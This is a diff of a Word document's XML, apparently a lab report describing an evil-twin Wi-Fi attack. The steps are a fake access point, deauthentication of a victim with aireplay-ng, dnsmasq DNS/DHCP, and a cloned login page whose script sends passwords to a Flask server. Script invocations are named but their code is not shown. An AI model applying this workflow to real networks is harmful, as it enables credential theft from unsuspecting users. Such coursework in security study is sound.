-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Task2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:line="360" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">The first step we done in this task is to create the fake AP, we have already plugin the ALFA </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>adaptor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>,and</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> following step will be:</w:t>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>The first step we done in this task is to create the fake AP, we have already plugin the ALFA adaptor</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>,and following step will be:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1212,14 +928,16 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
+          <w:noProof/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61038563" wp14:editId="50650F08">
-            <wp:extent cx="4260994" cy="6435436"/>
-            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:extent cx="5141631" cy="7765473"/>
+            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
             <wp:docPr id="1" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1240,7 +958,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4267319" cy="6444989"/>
+                      <a:ext cx="5151382" cy="7780200"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1260,78 +978,67 @@
         <w:adjustRightInd w:val="0"/>
         <w:spacing w:line="360" w:lineRule="atLeast"/>
         <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:line="360" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">fter the fake AP created, now we can </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>deauth</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the victim </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">by using </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>aireplay</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>-ng</w:t>
+        <w:t xml:space="preserve">fter the fake AP created, now we can deauth the victim </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>by using aireplay-ng</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1349,10 +1056,10 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB12081" wp14:editId="190222AC">
             <wp:extent cx="4378036" cy="1355585"/>
@@ -1496,39 +1203,19 @@
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>twinstart.sh</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>sh  twinstart.sh</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1577,6 +1264,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -1646,25 +1334,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">The script for </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>deauthencating</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (force victim to disconnect to real AP)</w:t>
+        <w:t>The script for deauthencating (force victim to disconnect to real AP)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1705,72 +1375,18 @@
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>deauth</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>.sh</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>victimMAC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> APMAC</w:t>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>sh  deauth.sh victimMAC APMAC</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1820,6 +1436,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:noProof/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -1867,6 +1484,7 @@
         </w:tabs>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
@@ -1879,10 +1497,20 @@
         </w:tabs>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:b/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>Task3</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1890,105 +1518,6 @@
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:b/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Task3</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="left" w:pos="5182"/>
-        </w:tabs>
-        <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
@@ -2000,43 +1529,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">We first install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>dnsmasq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> in the kali, and configure the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>conf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cstheme="minorHAnsi"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> file according below </w:t>
+        <w:t xml:space="preserve">We first install dnsmasq in the kali, and configure the conf file according below </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2054,14 +1547,14 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72ED6438" wp14:editId="387855E2">
-            <wp:extent cx="6065703" cy="6837218"/>
-            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
+            <wp:extent cx="6342255" cy="7148946"/>
+            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
             <wp:docPr id="8" name="Picture 8"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -2082,7 +1575,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="6072294" cy="6844648"/>
+                      <a:ext cx="6353852" cy="7162018"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2106,8 +1599,6 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2120,68 +1611,6 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">And execute the shell script to launch the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>dnsmsaq</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>dns</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> server and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>dhcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> server)</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2212,7 +1641,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>```</w:t>
+        <w:t>And execute the shell script to launch the dnsmsaq (dns server and dhcp server)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2221,31 +1650,51 @@
           <w:tab w:val="left" w:pos="5182"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times" w:hint="eastAsia"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  setting.sh</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>```</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="5182"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:t>sh  setting.sh</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2282,10 +1731,10 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:noProof/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="575D2549" wp14:editId="511721FF">
             <wp:extent cx="6354814" cy="6546273"/>
@@ -2373,37 +1822,20 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">on </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>on kali</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>kali</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>we assume this is similar as the real page which victim using)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+        <w:t>(we assume this is similar as the real page which victim using)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
+          <w:noProof/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
@@ -2503,74 +1935,835 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">the chrome will execute the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>the chrome will execute the js script sending the password to the flask server we build in the kali trough port 5000</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times" w:hAnsi="Times" w:cs="Times"/>
           <w:sz w:val="28"/>
